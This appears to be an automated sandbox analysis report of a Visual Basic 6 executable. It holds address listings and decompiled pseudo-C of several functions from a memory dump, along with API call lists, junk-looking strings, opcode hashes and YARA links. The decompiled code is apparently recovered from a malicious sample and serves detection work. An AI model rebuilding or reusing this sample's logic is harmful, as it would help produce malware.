0x0040dd1a
0x0040dd22
0x0040dd2a
0x0040dd2f
0x0040dd24
0x0040dd24
0x0040dd24
0x0040dd36
0x0040dd41
0x0040dd43
0x0040dd4e
0x0040dd56
0x0040dd5b
0x0040dd50
0x0040dd50
0x0040dd50
0x0040dd62
0x0040dd6d
0x0040dd6f
0x0040dd7a
0x0040dd82
0x0040dd87
0x0040dd7c
0x0040dd7c
0x0040dd7c
0x0040dd8e
0x0040dd99
0x0040dd9b
0x0040dda6
0x0040ddae
0x0040ddb3
0x0040dda8
0x0040dda8
0x0040dda8
0x0040ddba
0x0040ddc5
0x0040ddc7
0x0040ddd2
0x0040ddda
0x0040dddf
0x0040ddd4
0x0040ddd4
0x0040ddd4
0x0040dde6
0x0040ddf1
0x0040ddf3
0x0040ddfe
0x0040de06
0x0040de0b
0x0040de00
0x0040de00
0x0040de00
0x0040de12
0x0040de1d
0x0040de1f
0x0040de2a
0x0040de32
0x0040de37
0x0040de2c
0x0040de2c
0x0040de2c
0x0040de3e
0x0040de49
0x0040de4b
0x0040de56
0x0040de5e
0x0040de63
0x0040de58
0x0040de58
0x0040de58
0x0040de6a
0x0040de75
0x0040de77
0x0040de82
0x0040de8a
0x0040de8f
0x0040de84
0x0040de84
0x0040de84
0x0040de96
0x0040dea1
0x0040dea3
0x0040deae
0x0040deb6
0x0040debb
0x0040deb0
0x0040deb0
0x0040deb0
0x0040dec2
0x0040decd
0x0040decf
0x0040deda
0x0040dee2
0x0040dee7
0x0040dedc
0x0040dedc
0x0040dedc
0x0040deee
0x0040def9
0x0040defb
0x0040df06
0x0040df11
0x0040df16
0x0040df08
0x0040df08
0x0040df08
0x0040df20
0x0040df2b
0x0040df2d
0x0040df38
0x0040df43
0x0040df48
0x0040df3a
0x0040df3a
0x0040df3a
0x0040df52
0x0040df5d
0x0040df5f
0x0040df6a
0x0040df75
0x0040df7a
0x0040df6c
0x0040df6c
0x0040df6c
0x0040df84
0x0040df8f
0x0040df91
0x0040df9c
0x0040dfa7
0x0040dfac
0x0040df9e
0x0040df9e
0x0040df9e
0x0040dfb6
0x0040dfc1
0x0040dfc3
0x0040dfce
0x0040dfd9
0x0040dfde
0x0040dfd0
0x0040dfd0
0x0040dfd0
0x0040dfe8
0x0040dff3
0x0040dff5
0x0040e000
0x0040e00b
0x0040e010
0x0040e002
0x0040e002
0x0040e002
0x0040e01a
0x0040e025
0x0040e027
0x0040e032
0x0040e03d
0x0040e042
0x0040e034
0x0040e034
0x0040e034
0x0040e04c
0x0040e057
0x0040e059
0x0040e064
0x0040e06f
0x0040e074
0x0040e066
0x0040e066
0x0040e066
0x0040e07e
0x0040e089
0x0040e08b
0x0040e096
0x0040e0a1
0x0040e0a6
0x0040e098
0x0040e098
0x0040e098
0x0040e0b0
0x0040e0bb
0x0040e0bd
0x0040e0c8
0x0040e0d3
0x0040e0d8
0x0040e0ca
0x0040e0ca
0x0040e0ca
0x0040e0e2
0x0040e0ed
0x0040e0ef
0x0040e0fa
0x0040e105
0x0040e10a
0x0040e0fc
0x0040e0fc
0x0040e0fc
0x0040e114
0x0040e11f
0x0040e121
0x0040e12c
0x0040e137
0x0040e13c
0x0040e12e
0x0040e12e
0x0040e12e
0x0040e146
0x0040e151
0x0040e153
0x0040e15e
0x0040e169
0x0040e16e
0x0040e160
0x0040e160
0x0040e160
0x0040e178
0x0040e183
0x0040e185
0x0040e190
0x0040e19b
0x0040e1a0
0x0040e192
0x0040e192
0x0040e192
0x0040e1aa
0x0040e1b5
0x0040e1b7
0x0040e1c2
0x0040e1cd
0x0040e1d2
0x0040e1c4
0x0040e1c4
0x0040e1c4
0x0040e1dc
0x0040e1e7
0x0040e1e9
0x0040e1f4
0x0040e1ff
0x0040e204
0x0040e1f6
0x0040e1f6
0x0040e1f6
0x0040e20e
0x0040e219
0x0040e21b
0x0040e226
0x0040e231
0x0040e236
0x0040e228
0x0040e228
0x0040e228
0x0040e240
0x0040e24b
0x0040e24d
0x0040e258
0x0040e263
0x0040e268
0x0040e25a
0x0040e25a
0x0040e25a
0x0040e272
0x0040e27d
0x0040e27f
0x0040e287
0x0040e28f
0x0040e297
0x0040e29a
0x0040e29d
0x0040e29e
0x0040e2a0
0x0040e2a5

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040DCD0
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040DCFA
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040DD05
__vbaAryConstruct2.MSVBVM60(?,0040B1FC,00000011,?,?,?,?,004012A6), ref: 0040DD15
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD2A
__vbaUI1I2.MSVBVM60 ref: 0040DD36
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD56
__vbaUI1I2.MSVBVM60 ref: 0040DD62
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD82
__vbaUI1I2.MSVBVM60 ref: 0040DD8E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DDAE
__vbaUI1I2.MSVBVM60 ref: 0040DDBA
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DDDA
__vbaUI1I2.MSVBVM60 ref: 0040DDE6
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE06
__vbaUI1I2.MSVBVM60 ref: 0040DE12
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE32
__vbaUI1I2.MSVBVM60 ref: 0040DE3E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE5E
__vbaUI1I2.MSVBVM60 ref: 0040DE6A
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE8A
__vbaUI1I2.MSVBVM60 ref: 0040DE96
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DEB6
__vbaUI1I2.MSVBVM60 ref: 0040DEC2
__vbaUI1I2.MSVBVM60 ref: 0040DEEE
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DF11
__vbaUI1I2.MSVBVM60 ref: 0040DF20
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DF43
__vbaUI1I2.MSVBVM60 ref: 0040DF52
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DF75
__vbaUI1I2.MSVBVM60 ref: 0040DF84
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DFA7
__vbaUI1I2.MSVBVM60 ref: 0040DFB6
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DFD9
__vbaUI1I2.MSVBVM60 ref: 0040DFE8
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E00B
__vbaUI1I2.MSVBVM60 ref: 0040E01A
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E03D
__vbaUI1I2.MSVBVM60 ref: 0040E04C
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E06F
__vbaUI1I2.MSVBVM60 ref: 0040E07E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E0A1
__vbaUI1I2.MSVBVM60 ref: 0040E0B0
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E0D3
__vbaUI1I2.MSVBVM60 ref: 0040E0E2
__vbaUI1I2.MSVBVM60 ref: 0040E114
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E137
__vbaUI1I2.MSVBVM60 ref: 0040E146
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E169
__vbaUI1I2.MSVBVM60 ref: 0040E178
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E19B
__vbaUI1I2.MSVBVM60 ref: 0040E1AA
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E1CD
__vbaUI1I2.MSVBVM60 ref: 0040E1DC
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E1FF
__vbaUI1I2.MSVBVM60 ref: 0040E20E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E231
__vbaUI1I2.MSVBVM60 ref: 0040E240
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E263
__vbaUI1I2.MSVBVM60 ref: 0040E272
__vbaFreeVar.MSVBVM60(0040E2A6), ref: 0040E287
__vbaFreeStr.MSVBVM60(0040E2A6), ref: 0040E28F
__vbaAryDestruct.MSVBVM60(00000000,?,0040E2A6), ref: 0040E2A0

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$Free$ChkstkConstruct2CopyDestruct
String ID:
API String ID: 1600147872-0
Opcode ID: 516b29f6b96a5397bb57d4639673c83507d55550448d2dc1f94abd00265e3ac1
Instruction ID: b20ec95011615556945b8f7f3e6c0dbc018d84acd290383d8e050d151163ada1
Opcode Fuzzy Hash: 516b29f6b96a5397bb57d4639673c83507d55550448d2dc1f94abd00265e3ac1
Instruction Fuzzy Hash: 4402A074C06208CFEB20EFA6C5517ACBBB1AF15319F1484AFD416BA692C778154ACF1B

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBA4, Relevance: 96.6, APIs: 54, Strings: 1, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040BBA4(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, signed int _a24) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char* _v28;
				char* _v32;
				void* _v36;
				signed int _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				short _v100;
				char _v108;
				char _v124;
				char _v140;
				char* _v148;
				char _v156;
				intOrPtr _v196;
				char _v204;
				char* _v208;
				short _v212;
				char* _v216;
				signed int _v220;
				signed int _v224;
				char* _v236;
				intOrPtr* _v240;
				intOrPtr _v252;
				void* _v260;
				void* _t161;
				char* _t167;
				void* _t168;
				char* _t169;
				char* _t172;
				char* _t175;
				signed short _t184;
				char* _t196;
				intOrPtr _t197;
				signed int _t199;
				short _t210;
				char* _t215;
				intOrPtr _t222;
				void* _t225;
				void* _t228;
				void* _t232;
				char* _t237;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t267;
				intOrPtr _t268;
				void* _t269;
				intOrPtr* _t270;

				_t263 = __esi;
				_t260 = __edi;
				_t232 = __ebx;
				_t265 = _t267;
				_t268 = _t267 - 0xc;
				asm("cmpsb");
				asm("adc al, [eax]");
				 *[fs:0x0] = _t268;
				 *0xd8 =  *0xd8 + 0xd8;
				asm("fst dword [esi-0x1]");
				_t161 =  *((intOrPtr*)(__ebx + 0x56))();
				_v12 = _t268;
				_v8 = E00401150;
				_v4 = 0;
				 *0xd8 =  *0xd8 + _t161;
				 *((intOrPtr*)( *_a8 + 4))(_a8, __edi,  *[fs:0x0], _t264);
				_push( &_v24);
				_push(0x2003f);
				_push(0);
				_push( *_a16);
				_t167 =  &_v56;
				_push(_t167);
				L00401474();
				_push(_t167);
				_t168 = _a12;
				_push( *_t168);
				E0040AFDC();
				_v208 = _t168;
				L0040146E();
				_push(_v56);
				_push(_a16);
				L00401468();
				_t169 = _v208;
				_v32 = _t169;
				L00401462();
				if(_v32 == 0) {
					_v68 = _v68 & 0x00000000;
					_v76 = 2;
					_push( &_v76);
					_push(0x400);
					L00401456();
					L0040145C();
					L00401450();
					_v52 = 0x400;
					_push( &_v52);
					_push(_v48);
					_t172 =  &_v60;
					_push(_t172);
					L00401474();
					_push(_t172);
					_push( &_v36);
					_push(0);
					_push( *_a20);
					_t175 =  &_v56;
					_push(_t175);
					L00401474();
					_push(_t175);
					_push(_v24);
					E0040B04C();
					_v208 = _t175;
					L0040146E();
					_push(_v56);
					_push(_a20);
					L00401468();
					_push(_v60);
					_push( &_v48);
					L00401468();
					_v32 = _v208;
					_push( &_v60);
					_t169 =  &_v56;
					_push(_t169);
					_push(2);
					L0040144A();
					_t269 = _t268 + 0xc;
					if(_v32 == 0) {
						_v68 = 1;
						_v76 = 2;
						_v148 =  &_v48;
						_v156 = 0x4008;
						_push( &_v76);
						_push(_v52);
						_push( &_v156);
						_push( &_v92);
						L00401438();
						_push( &_v92);
						_t184 =  &_v56;
						_push(_t184);
						L0040143E();
						_push(_t184);
						L00401444();
						asm("sbb eax, eax");
						_v212 =  ~( ~_t184 + 1);
						_t237 =  &_v56;
						L00401462();
						_push( &_v92);
						_push( &_v76);
						_push(2);
						L00401432();
						_t270 = _t269 + 0xc;
						if(_v212 == 0) {
							_v148 =  &_v48;
							_v156 = 0x4008;
							_push(_v52);
							_push( &_v156);
							_push( &_v76);
							L00401426();
							_push( &_v76);
							L0040142C();
							L0040145C();
							L00401450();
							goto L17;
						} else {
							_v148 =  &_v48;
							_v156 = 0x4008;
							_t228 = _v52 - 1;
							if(_t228 < 0) {
								L31:
								L004013FC();
								 *[fs:0x0] = _t270;
								L004012A0();
								_v240 = _t270;
								_v236 = 0x401160;
								_v252 = 0xa066336a;
								_t225 =  *_t270(0x40240a, _t260, _t263, _t232, 0x10,  *[fs:0x0], 0x4012a6, _t237, _t237, _t265);
								L0040145C();
								_push(_v252);
								_push(L"Lindormen");
								L004013F6();
								L0040145C();
								_push(_v252);
								_push(L"Lindormen");
								L004013F6();
								L0040145C();
								_push(E0040C0D7);
								L00401462();
								return _t225;
							} else {
								_push(_t228);
								_push( &_v156);
								_push( &_v76);
								L00401426();
								_push( &_v76);
								L0040142C();
								L0040145C();
								L00401450();
								L17:
								_v216 = _v36;
								_t196 = _v216;
								_v236 = _t196;
								if(_v236 == 1) {
									L00401420();
									goto L27;
								} else {
									if(_v236 == 4) {
										_v224 = 1;
										_v220 = _v220 | 0xffffffff;
										_push(_v48);
										L0040141A();
										_v28 = _t196;
										while(_v28 >= _v224) {
											_v196 =  *_a24;
											_v204 = 8;
											_v68 = 1;
											_v76 = 2;
											_v148 =  &_v48;
											_v156 = 0x4008;
											_push( &_v76);
											_push(_v28);
											_push( &_v156);
											_push( &_v92);
											L00401438();
											_push( &_v92);
											_t210 =  &_v56;
											_push(_t210);
											L0040143E();
											_push(_t210);
											L00401444();
											_v100 = _t210;
											_v108 = 2;
											_push( &_v108);
											_push( &_v124);
											L0040140E();
											_push( &_v204);
											_push( &_v124);
											_t215 =  &_v140;
											_push(_t215);
											L00401414();
											_push(_t215);
											L0040142C();
											L0040145C();
											_t237 =  &_v56;
											L00401462();
											_push( &_v140);
											_push( &_v124);
											_push( &_v108);
											_push( &_v92);
											_push( &_v76);
											_push(5);
											L00401432();
											_t270 = _t270 + 0x18;
											_t222 = _v28 + _v220;
											if(_t222 < 0) {
												goto L31;
											} else {
												_v28 = _t222;
												continue;
											}
											goto L33;
										}
										_v84 = 0x80020004;
										_v92 = 0xa;
										_push(0x40b11c);
										_t199 = _a24;
										_push( *_t199);
										L00401402();
										_v68 = _t199;
										_v76 = 8;
										_push(1);
										_push(1);
										_push( &_v92);
										_push( &_v76);
										L00401408();
										L0040145C();
										_push( &_v92);
										_t196 =  &_v76;
										_push(_t196);
										_push(2);
										L00401432();
										goto L27;
									} else {
										L27:
										_v44 = _v44 | 0x0000ffff;
										_push(_v24);
										E0040B090();
										_v208 = _t196;
										L0040146E();
										_t197 = _v208;
										_v32 = _t197;
										goto L29;
									}
								}
							}
						}
					} else {
						goto L28;
					}
				} else {
					L28:
					L00401420();
					_v44 = _v44 & 0x00000000;
					_push(_v24);
					E0040B090();
					_v208 = _t169;
					L0040146E();
					_t197 = _v208;
					_v32 = _t197;
					L29:
					_push(E0040C022);
					L00401462();
					return _t197;
				}
				L33:
			}

0x0040bba4
0x0040bba4
0x0040bba4
0x0040bba5
0x0040bba7
0x0040bbab
0x0040bbac
0x0040bbb6
0x0040bbbf
0x0040bbc3
0x0040bbc6
0x0040bbca
0x0040bbcd
0x0040bbd4
0x0040bbd9
0x0040bbe3
0x0040bbe9
0x0040bbea
0x0040bbef
0x0040bbf4
0x0040bbf6
0x0040bbf9
0x0040bbfa
0x0040bbff
0x0040bc00
0x0040bc03
0x0040bc05
0x0040bc0a
0x0040bc10
0x0040bc15
0x0040bc18
0x0040bc1b
0x0040bc20
0x0040bc26
0x0040bc2c
0x0040bc35
0x0040bc3c
0x0040bc40
0x0040bc4a
0x0040bc4b
0x0040bc50
0x0040bc5a
0x0040bc62
0x0040bc67
0x0040bc71
0x0040bc72
0x0040bc75
0x0040bc78
0x0040bc79
0x0040bc7e
0x0040bc82
0x0040bc83
0x0040bc88
0x0040bc8a
0x0040bc8d
0x0040bc8e
0x0040bc93
0x0040bc94
0x0040bc97
0x0040bc9c
0x0040bca2
0x0040bca7
0x0040bcaa
0x0040bcad
0x0040bcb2
0x0040bcb8
0x0040bcb9
0x0040bcc4
0x0040bcca
0x0040bccb
0x0040bcce
0x0040bccf
0x0040bcd1
0x0040bcd6
0x0040bcdd
0x0040bce4
0x0040bceb
0x0040bcf5
0x0040bcfb
0x0040bd08
0x0040bd09
0x0040bd12
0x0040bd16
0x0040bd17
0x0040bd1f
0x0040bd20
0x0040bd23
0x0040bd24
0x0040bd29
0x0040bd2a
0x0040bd32
0x0040bd37
0x0040bd3e
0x0040bd41
0x0040bd49
0x0040bd4d
0x0040bd4e
0x0040bd50
0x0040bd55
0x0040bd61
0x0040bdb3
0x0040bdb9
0x0040bdc3
0x0040bdcc
0x0040bdd0
0x0040bdd1
0x0040bdd9
0x0040bdda
0x0040bde4
0x0040bdec
0x00000000
0x0040bd63
0x0040bd66
0x0040bd6c
0x0040bd79
0x0040bd7c
0x0040c04b
0x0040c04b
0x0040c061
0x0040c06b
0x0040c073
0x0040c076
0x0040c07d
0x0040c090
0x0040c096
0x0040c09b
0x0040c09e
0x0040c0a3
0x0040c0ad
0x0040c0b2
0x0040c0b5
0x0040c0ba
0x0040c0c4
0x0040c0c9
0x0040c0d1
0x0040c0d6
0x0040bd82
0x0040bd82
0x0040bd89
0x0040bd8d
0x0040bd8e
0x0040bd96
0x0040bd97
0x0040bda1
0x0040bda9
0x0040bdf1
0x0040bdf4
0x0040bdfa
0x0040be00
0x0040be0d
0x0040be23
0x00000000
0x0040be0f
0x0040be16
0x0040be2d
0x0040be37
0x0040be3e
0x0040be41
0x0040be46
0x0040be5d
0x0040be71
0x0040be77
0x0040be81
0x0040be88
0x0040be92
0x0040be98
0x0040bea5
0x0040bea6
0x0040beaf
0x0040beb3
0x0040beb4
0x0040bebc
0x0040bebd
0x0040bec0
0x0040bec1
0x0040bec6
0x0040bec7
0x0040becc
0x0040bed0
0x0040beda
0x0040bede
0x0040bedf
0x0040beea
0x0040beee
0x0040beef
0x0040bef5
0x0040bef6
0x0040befb
0x0040befc
0x0040bf06
0x0040bf0b
0x0040bf0e
0x0040bf19
0x0040bf1d
0x0040bf21
0x0040bf25
0x0040bf29
0x0040bf2a
0x0040bf2c
0x0040bf31
0x0040be4e
0x0040be54
0x00000000
0x0040be5a
0x0040be5a
0x00000000
0x0040be5a
0x00000000
0x0040be54
0x0040bf39
0x0040bf40
0x0040bf47
0x0040bf4c
0x0040bf4f
0x0040bf51
0x0040bf56
0x0040bf59
0x0040bf60
0x0040bf62
0x0040bf67
0x0040bf6b
0x0040bf6c
0x0040bf76
0x0040bf7e
0x0040bf7f
0x0040bf82
0x0040bf83
0x0040bf85
0x00000000
0x0040be18
0x0040bf8d
0x0040bf8d
0x0040bf92
0x0040bf95
0x0040bf9a
0x0040bfa0
0x0040bfa5
0x0040bfab
0x00000000
0x0040bfab
0x0040be16
0x0040be0d
0x0040bd7c
0x0040bcdf
0x00000000
0x0040bcdf
0x0040bc37
0x0040bfb0
0x0040bfb8
0x0040bfbd
0x0040bfc2
0x0040bfc5
0x0040bfca
0x0040bfd0
0x0040bfd5
0x0040bfdb
0x0040bfde
0x0040bfde
0x0040c01c
0x0040c021
0x0040c021
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BBC2
__vbaStrToAnsi.MSVBVM60(?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BBFA
__vbaSetSystemError.MSVBVM60(?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BC10
__vbaStrToUnicode.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BC1B
__vbaFreeStr.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BC2C
#606.MSVBVM60(00000400,00000002), ref: 0040BC50
__vbaStrMove.MSVBVM60(00000400,00000002), ref: 0040BC5A
__vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BC62
__vbaStrToAnsi.MSVBVM60(?,004012A6,00000400,00000400,00000002), ref: 0040BC79
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BC8E
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BCA2
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BCAD
__vbaStrToUnicode.MSVBVM60(004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BCB9
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6), ref: 0040BCD1
__vbaStrCopy.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?), ref: 0040BFB8
__vbaSetSystemError.MSVBVM60(?), ref: 0040BFD0
__vbaFreeStr.MSVBVM60(0040C022,?), ref: 0040C01C

Strings

Lindormen, xrefs: 0040C09E, 0040C0B5

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
String ID: Lindormen
API String ID: 3225542645-1899767452
Opcode ID: a929fa68a9e144cd05d446eb9b057dd2f0398e660fa54326cf0ba084e352af9c
Instruction ID: 4259e8b3c110df560300c31062315359bdef7d94cc895980747e2d7f112238fe
Opcode Fuzzy Hash: a929fa68a9e144cd05d446eb9b057dd2f0398e660fa54326cf0ba084e352af9c
Instruction Fuzzy Hash: 8FE1B771D0021DABDB10EFE1C845FDEBBB8AF04308F10856AF515B71A2DB789A458F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E652, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040E652(void* __ebx, void* __edi, void* __esi, char* _a4, void* _a8, void* _a24, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				intOrPtr _v60;
				void* _v76;
				char _v88;
				char _v104;
				char* _v128;
				char _v136;
				char* _v160;
				intOrPtr _v168;
				intOrPtr _v192;
				intOrPtr _v200;
				char _v220;
				void* _v224;
				signed int _v228;
				intOrPtr* _v240;
				signed int _v244;
				short _t63;
				short _t64;
				char* _t69;
				signed int _t73;
				void* _t101;
				void* _t103;
				intOrPtr _t104;

				_t104 = _t103 - 0xc;
				 *[fs:0x0] = _t104;
				L004012A0();
				_v16 = _t104;
				_v12 = 0x401220;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t101);
				L004013E4();
				L004013E4();
				L004013E4();
				_push( &_v104);
				L00401372();
				_v128 = L"supraspinate";
				_v136 = 0x8008;
				_push( &_v104);
				_t63 =  &_v136;
				_push(_t63);
				L00401378();
				_v224 = _t63;
				L00401450();
				_t64 = _v224;
				if(_t64 != 0) {
					_v128 = _a4;
					_v136 = 9;
					_v160 = L"dreas";
					_v168 = 8;
					if( *0x410010 != 0) {
						_v240 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v240 = 0x410010;
					}
					_t69 =  &_v88;
					L004013CC();
					_v224 = _t69;
					_t73 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v220, _t69,  *((intOrPtr*)( *((intOrPtr*)( *_v240)) + 0x318))( *_v240));
					asm("fclex");
					_v228 = _t73;
					if(_v228 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b1ac);
						_push(_v224);
						_push(_v228);
						L004013D8();
						_v244 = _t73;
					}
					_v192 = _v220;
					_v200 = 3;
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t64 = 0x10;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"JmVo9kBNN3193");
					_push(_v60);
					L0040136C();
					L004013D2();
				}
				asm("wait");
				_push(E0040E878);
				L00401450();
				L00401450();
				L004013D2();
				L00401450();
				return _t64;
			}

0x0040e655
0x0040e664
0x0040e670
0x0040e678
0x0040e67b
0x0040e682
0x0040e691
0x0040e69a
0x0040e6a5
0x0040e6b0
0x0040e6b8
0x0040e6b9
0x0040e6be
0x0040e6c5
0x0040e6d2
0x0040e6d3
0x0040e6d9
0x0040e6da
0x0040e6df
0x0040e6e9
0x0040e6ee
0x0040e6f7
0x0040e700
0x0040e703
0x0040e70d
0x0040e717
0x0040e728
0x0040e745
0x0040e72a
0x0040e72a
0x0040e72f
0x0040e734
0x0040e739
0x0040e739
0x0040e769
0x0040e76d
0x0040e772
0x0040e78d
0x0040e790
0x0040e792
0x0040e79f
0x0040e7c1
0x0040e7a1
0x0040e7a1
0x0040e7a3
0x0040e7a8
0x0040e7ae
0x0040e7b4
0x0040e7b9
0x0040e7b9
0x0040e7ce
0x0040e7d4
0x0040e7de
0x0040e7e1
0x0040e7ee
0x0040e7ef
0x0040e7f0
0x0040e7f1
0x0040e7f2
0x0040e7f5
0x0040e802
0x0040e803
0x0040e804
0x0040e805
0x0040e808
0x0040e809
0x0040e816
0x0040e817
0x0040e818
0x0040e819
0x0040e81a
0x0040e81c
0x0040e821
0x0040e824
0x0040e82f
0x0040e82f
0x0040e834
0x0040e835
0x0040e85a
0x0040e862
0x0040e86a
0x0040e872
0x0040e877

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E670
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E69A
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E6A5
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E6B0
#670.MSVBVM60(?,?,?,?,?,004012A6), ref: 0040E6B9
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E6DA
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E6E9
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,?,?,?,?,00008008,?), ref: 0040E734
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E76D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000060), ref: 0040E7B4
__vbaChkstk.MSVBVM60(00000000,?,0040B1AC,00000060), ref: 0040E7E1
__vbaChkstk.MSVBVM60(00000000,?,0040B1AC,00000060), ref: 0040E7F5
__vbaChkstk.MSVBVM60(00000000,?,0040B1AC,00000060), ref: 0040E809
__vbaLateMemCall.MSVBVM60(?,JmVo9kBNN3193,00000003), ref: 0040E824
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040E82F
__vbaFreeVar.MSVBVM60(0040E878,00008008,?), ref: 0040E85A
__vbaFreeVar.MSVBVM60(0040E878,00008008,?), ref: 0040E862
__vbaFreeObj.MSVBVM60(0040E878,00008008,?), ref: 0040E86A
__vbaFreeVar.MSVBVM60(0040E878,00008008,?), ref: 0040E872

Strings

pi, xrefs: 0040E721, 0040E72A, 0040E739, 0040E745
dreas, xrefs: 0040E70D
JmVo9kBNN3193, xrefs: 0040E81C
supraspinate, xrefs: 0040E6BE

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$#670CallCheckHresultLateNew2
String ID: JmVo9kBNN3193$dreas$pi$supraspinate
API String ID: 1440615753-1445102746
Opcode ID: 4c06daa5284fdfa4a598ad7b7bd5379e84adbc99edc17929b169eb64f6991820
Instruction ID: 3468d6fcd366beb72819181b316469e082ae4a768b85f60a25be14c2b2c2c1d9
Opcode Fuzzy Hash: 4c06daa5284fdfa4a598ad7b7bd5379e84adbc99edc17929b169eb64f6991820
Instruction Fuzzy Hash: 3F512871900218DFDB20EF91C845BCDB7B5BF08704F1084AAF409BB2A1DBB95A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E97E, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 160
COMMON

Download Yara Rule
